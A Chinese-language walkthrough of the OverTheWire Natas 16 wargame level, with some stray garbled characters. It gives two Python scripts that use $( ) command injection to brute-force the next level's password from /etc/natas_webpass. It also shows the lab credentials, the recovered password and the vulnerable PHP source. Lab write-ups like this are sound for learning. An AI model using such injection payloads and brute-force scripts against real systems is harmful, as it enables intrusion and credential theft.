16.8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

• 這道題目是考察當(dāng)命令執(zhí)行被過濾如下所示的源代碼中的字符跃闹，還可以這樣使用 $(command)
• 查看源代碼可知可以在grep中嵌套grep
• 例如：grep -i $(grep -i a natas17.txt) dictionary.txt
• 最終可以類似這樣測試 $(grep a /etc/natas_webpass/natas17)abacus
• 所以使用如下Python腳本

#!/usr/local/bin/python3
# -*- coding=utf-8 -*-
# Author: Xiaoyunqi

import requests
from string import ascii_lowercase
from string import ascii_uppercase

chars = ascii_lowercase + ascii_uppercase + "0123456789"
pwd = ""
isDone = False
# print(chars)

while not isDone:
    for char in chars:
        searchPattern = '^' + pwd + char
        r = requests.post("http://natas16.natas.labs.overthewire.org/index.php", data={'needle': '$(grep ' + searchPattern + ' /etc/natas_webpass/natas17)abacus'}, auth=('natas16','WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'))
        if b"abacus" not in r.content:
            pwd += char
            print('Character "' + char + '" found')
            break
    else:
        isDone = True
print (pwd)

• 跑出來的最終結(jié)果如下：

Character "8" found
Character "P" found
Character "s" found
Character "3" found
Character "H" found
Character "0" found
Character "G" found
Character "W" found
Character "b" found
Character "n" found
Character "5" found
Character "r" found
Character "d" found
Character "9" found
Character "S" found
Character "7" found
Character "G" found
Character "m" found
Character "A" found
Character "d" found
Character "g" found
Character "Q" found
Character "N" found
Character "d" found
Character "k" found
Character "h" found
Character "P" found
Character "k" found
Character "q" found
Character "9" found
Character "c" found
Character "w" found
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

• 另一個版本的Python代碼

#!/usr/local/bin/python3
# -*- coding=utf-8 -*-
# Author: Xiaoyunqi


import requests
from string import ascii_lowercase
from string import ascii_uppercase


url = "http://natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh@natas16.natas.labs.overthewire.org/"
key = ''
# char = ascii_lowercase + ascii_uppercase + "0123456789"
char = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
while len(key) < 32:
    for i in char:
        payload = {'needle':'$(grep ^'+key+i+'.* /etc/natas_webpass/natas17)wrong','submit':'Search'}
        req = requests.get(url=url,params=payload)
        if 'wrong' not in req.text:
            key += i

    print (key)

• 源代碼

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
?>

Recomment

• https://medium.com/hacker-toolbelt/natas-16-command-injection-with-zap-and-python-bb95fbc8f5ac

• 免責(zé)申明:本人所撰寫的文章矫限，僅供學(xué)習(xí)和研究使用缔莲，請勿使用文中的技術(shù)或源碼用于非法用途膘魄，任何人造成的任何負(fù)面影響，或觸犯法律做瞪，與本人無關(guān)